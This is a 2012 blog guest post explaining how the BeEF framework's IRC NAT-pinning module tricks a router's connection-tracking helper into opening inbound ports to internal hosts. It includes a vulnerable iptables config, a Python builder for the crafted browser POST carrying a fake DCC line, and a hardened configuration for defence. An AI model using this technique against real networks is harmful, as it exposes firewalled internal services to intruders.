Saturday, July 14, 2012

Opening closed ports on a NAT device and bypassing stateful firewalls with BeEF

Today's guest post comes from Bart Leppens. Thank you!

In 2010 Samy Kamkar published a technique he called "NAT Pinning". The idea: an attacker lures a victim to a web page, and that page makes the victim's browser send traffic that tricks the victim's router or firewall into forwarding an arbitrary port back to the victim's machine. The router, firewall or NAT device must support connection tracking with application-layer helpers (the IRC DCC helper in the case discussed here), because it is the helper that opens the "related" port. Samy Kamkar successfully tested this against a Belkin N1 Vision wireless router.

IRC NAT Pinning is now integrated in BeEF as a module. It requires the victim to use Firefox, because most other browsers refuse to connect to port 6667 (the IRC port the attack has to reach). In this example iptables is used as the NAT/firewall to demonstrate how the attack actually works.

Let's imagine the following network:

And the configuration for iptables on the NAT/firewall:
 
#! /bin/sh

# DEFs
OUTIF=eth0                 # WAN side
LANIF=eth1                 # LAN side
LAN=192.168.1.0/24

# MODULES
# Connection tracking plus the application-layer helpers. The IRC helper is the
# one this attack abuses: it is what turns the attacker's inbound connection into
# a RELATED one. ip_conntrack_irc is the old module name; on current kernels the
# module is nf_conntrack_irc and the old name still works as an alias.
modprobe ip_conntrack
modprobe ip_conntrack_ftp
modprobe ip_conntrack_irc
modprobe iptable_nat

# Cleaning
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Kernel vars
echo 1 > /proc/sys/net/ipv4/ip_forward

# Allow unlimited traffic on the loopback interface
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT

# Set default policies
iptables --policy INPUT DROP
iptables --policy OUTPUT DROP
iptables --policy FORWARD DROP

# Previously initiated and accepted exchanges bypass rule checking
# Allow unlimited outbound traffic from the gateway itself
iptables -A OUTPUT -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT
iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

# Allow inbound traffic on LAN
iptables -A INPUT -i $LANIF -j ACCEPT

# NAT
##########
iptables -t nat -A POSTROUTING -o $OUTIF -j MASQUERADE

# Replies to connections initiated from the LAN, and anything a helper has
# marked RELATED: this is the rule that lets the helper-expected connection in
iptables --append FORWARD -m state --state ESTABLISHED,RELATED -i $OUTIF -o $LANIF -j ACCEPT

# Allow unlimited outbound traffic from LAN to WAN
iptables --append FORWARD -m state --state NEW,ESTABLISHED,RELATED -o $OUTIF -i $LANIF -j ACCEPT

# Log and drop everything else
iptables -A INPUT -j LOG --log-level debug
iptables -A INPUT -j DROP
iptables -A FORWARD -j LOG --log-level debug
iptables -A FORWARD -j DROP


Two things in this configuration make the attack possible: iptables accepts RELATED inbound connections (the FORWARD rule for ESTABLISHED,RELATED from WAN to LAN) and the IRC connection tracking helper is loaded. Without the helper nothing is ever marked RELATED and the attack fails.

Suppose that the machine with IP 192.168.1.100 runs an Apache web server on port 80 serving an intranet site, and that this site is normally not reachable from outside (e.g. from the Internet).

When the attack is executed, BeEF opens a temporary socket listening on port 6667 for the victim's incoming TCP connection; that connection, and the fake IRC traffic the browser sends over it, is what the connection tracking helper inspects. The original demo used netcat for this ("nc -l -p 6667"), but thanks to Antisnatchor this is no longer needed: the module does it itself.

Once this is done, fill in the correct parameters in BeEF (the private IP and private port of the internal machine, here 192.168.1.100 and 80) and then test whether the port has been opened by connecting to the gateway's public address on that port from outside.
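To make the mechanism concrete, here is an added example (not code from the original post or from BeEF) that models the trick at the byte level: what a browser actually sends when a form is POSTed to the attacker's host on port 6667, and what an IRC connection tracking helper does with that payload. The helper part is a simplified model of the kernel's nf_conntrack_irc logic, not the kernel code; the hostname attacker.example, the nick, and the addresses and ports are constructed for the example.

```python
"""Added example, not code from the original post or from BeEF: the NAT pinning
trick modelled at the payload level.

build_browser_post() produces the bytes a browser sends when a form is POSTed
to the attacker's host on TCP/6667; irc_helper() is a simplified
re-implementation of what an IRC connection tracking helper does with that
payload (the real one is nf_conntrack_irc in the kernel). Hostname, nick,
addresses and ports are constructed for the example."""
import ipaddress
import re
from typing import Optional, Tuple

# DCC sub-commands a helper recognises after the "\x01DCC " prefix
# (same list as nf_conntrack_irc's dccprotos table).
DCC_COMMANDS = (b"SEND ", b"CHAT ", b"MOVE ", b"TSEND ", b"SCHAT ")


def dcc_address(ip: str) -> int:
    """DCC carries an IPv4 address as its 32-bit value in decimal:
    192.168.1.100 -> 3232235876."""
    return int(ipaddress.IPv4Address(ip))


def build_browser_post(private_ip: str, private_port: int,
                       host: str = "attacker.example") -> bytes:
    """Request a browser emits for a text/plain form POST to http://host:6667/
    whose one field holds a fake IRC DCC CHAT offer for private_ip:private_port
    (BeEF's 'private IP' / 'private port' parameters). The helper never looks
    at HTTP; it only scans the TCP payload of a port-6667 flow for '\x01DCC '."""
    dcc_line = (b"PRIVMSG pinned :\x01DCC CHAT chat "
                + str(dcc_address(private_ip)).encode()
                + b" " + str(private_port).encode() + b"\x01\r\n")
    body = b"pin=" + dcc_line
    return (b"POST / HTTP/1.1\r\n"
            b"Host: " + host.encode() + b":6667\r\n"
            b"Content-Type: text/plain\r\n"
            b"Content-Length: " + str(len(body)).encode() + b"\r\n"
            b"\r\n" + body)


def find_dcc_offer(payload: bytes) -> Optional[Tuple[str, int]]:
    """Scan a payload the way the helper does: find '\x01DCC <CMD> ', skip the
    first argument (file name or 'chat'), read a decimal IPv4 address and a
    port. The helper also insists on a newline inside the same packet."""
    pos = 0
    while (pos := payload.find(b"\x01DCC ", pos)) >= 0:
        pos += 5
        for cmd in DCC_COMMANDS:
            if payload.startswith(cmd, pos):
                rest = payload[pos + len(cmd):]
                m = re.match(rb"[^ \r\n]+ +(\d+) +(\d+)", rest)
                if m and b"\n" in rest:
                    ip = ipaddress.IPv4Address(int(m.group(1)) & 0xFFFFFFFF)
                    return str(ip), int(m.group(2)) & 0xFFFF
                break
    return None


def irc_helper(flow_src_ip: str, payload: bytes) -> Optional[Tuple[str, int]]:
    """Decision the helper takes for one client->server packet of a flow whose
    client address (as the firewall sees it) is flow_src_ip. A plausible offer
    creates an expectation: the next inbound connection from anywhere to
    flow_src_ip on the offered port is classified RELATED and passes the
    'ESTABLISHED,RELATED' rules. An offer naming some other address is treated
    as forged and ignored (simplified from the kernel's own check)."""
    offer = find_dcc_offer(payload)
    if offer is None:
        return None
    claimed_ip, port = offer
    if claimed_ip != flow_src_ip or port == 0:
        return None            # forged DCC command: no expectation
    return flow_src_ip, port   # expectation: * -> flow_src_ip:port is RELATED


if __name__ == "__main__":
    request = build_browser_post("192.168.1.100", 80)
    print(request.decode("latin-1"))
    print("expectation:", irc_helper("192.168.1.100", request))
```

The point to take away is in irc_helper(): the HTTP request line, headers and form field name are all just bytes the helper skips over until it meets "\x01DCC ", so any protocol that lets a browser put attacker-chosen text on a port-6667 connection is enough. In the NAT case the kernel's NAT helper for IRC additionally rewrites the expected destination to the internal host, which is why the "private IP" parameter has to name the machine behind the gateway.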

This can be seen on the following video:



The same can be attempted without NAT. In this case the stateful firewall (e.g. iptables) also needs to accept RELATED inbound connections and to have the IRC connection tracking module loaded.


Now imagine that telnetd is running on the victim's machine but is not reachable because of the firewall's packet filtering. In BeEF you proceed exactly as shown before, except that in this case the "private IP" is the victim's public IP and the "private port" is the telnet port (probably 23).

If you're using iptables and want to avoid this kind of problem with connection tracking, refer to the netfilter document "Secure use of iptables and connection tracking helpers" by Eric Leblond. It describes the best practices for using connection tracking helpers: turn off automatic helper assignment (the net.netfilter.nf_conntrack_helper sysctl, available since Linux 3.5 and disabled by default on current kernels) and attach a helper explicitly, with the CT target in the raw table, only to the flows towards the servers that really need it, so that a browser talking to an arbitrary host on port 6667 never gets the IRC helper at all.
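As an added example (not from the original post), here is the helper-related part of the gateway script above rewritten along those lines, with the weak variant kept beside it for comparison. The IRC server address 203.0.113.10 and the interface names are assumptions; RUN=echo prints the commands instead of applying them, which is also how the example can be inspected without root.

```shell
#!/bin/sh
# Added example (not from the original post): the IRC helper locked down along
# the lines of the netfilter "secure use of connection tracking helpers"
# guidance. IRC_SERVER (a TEST-NET-3 address) and the interface names are
# assumptions. RUN is a dry-run prefix: RUN=echo prints the commands.
RUN=${RUN:-}
OUTIF=${OUTIF:-eth0}
LANIF=${LANIF:-eth1}
IRC_SERVER=${IRC_SERVER:-203.0.113.10}

weak_helper_rules() {
    # What the post's script relies on: the helper is attached automatically to
    # every TCP flow with destination port 6667, whatever the server is, and any
    # RELATED flow is accepted. A browser that can be made to POST to an
    # attacker's port 6667 is therefore enough to get a port opened.
    $RUN modprobe ip_conntrack_irc
    $RUN iptables -A FORWARD -i "$OUTIF" -o "$LANIF" \
        -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
}

hardened_helper_rules() {
    # 1. No automatic helper assignment (sysctl available since Linux 3.5).
    $RUN sysctl -w net.netfilter.nf_conntrack_helper=0
    # 2. Attach the IRC helper explicitly, and only to LAN flows towards the
    #    one IRC server that is actually allowed. A flow to the attacker's
    #    host on 6667 gets no helper, so its DCC line creates no expectation.
    $RUN modprobe nf_conntrack_irc
    $RUN iptables -t raw -A PREROUTING -i "$LANIF" -p tcp \
        -d "$IRC_SERVER" --dport 6667 -j CT --helper irc
    # 3. Replies to existing flows are fine; RELATED flows are accepted only
    #    when the IRC helper created the expectation. (The peer of a DCC
    #    session is another IRC user, not the server, so the source is not
    #    restricted here.) Anything else claiming to be RELATED is logged.
    $RUN iptables -A FORWARD -i "$OUTIF" -o "$LANIF" \
        -m conntrack --ctstate ESTABLISHED -j ACCEPT
    $RUN iptables -A FORWARD -i "$OUTIF" -o "$LANIF" \
        -m conntrack --ctstate RELATED -m helper --helper irc -j ACCEPT
    $RUN iptables -A FORWARD -i "$OUTIF" -o "$LANIF" \
        -m conntrack --ctstate RELATED -j LOG --log-prefix "unexpected RELATED: "
}
```

Run it with RUN=echo first and read the output; then, on the gateway, apply hardened_helper_rules in place of the single ESTABLISHED,RELATED rule of the original script. The FTP helper deserves the same treatment if it stays loaded.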

19 comments:

  1. I think in the top image the gateway's IP address should be 72.12.13.4, is that correct? At least that's what I see in the video at the end....

    So... you can also control the internal IP to which the forward is done?

  2. Yes, the gateway IP should be 72.12.13.4. My bad!
    The internal IP can be fully controlled and doesn't need to be the victim's IP.
  4. Hi,

    I have contributed a script for Nmap a while back that checks for vulnerable firewalls based on Eric Leblond's work on opensvp ( https://home.regit.org/2012/06/opensvp-a-new-tool-to-analyse-the-security-of-firewalls-using-algs/ ). You can find the script here: http://nmap.org/nsedoc/scripts/firewall-bypass.html

    Cheers,
    Hani.

    Replies
    1. That's just fantastic Hani! I'll look at it more in detail.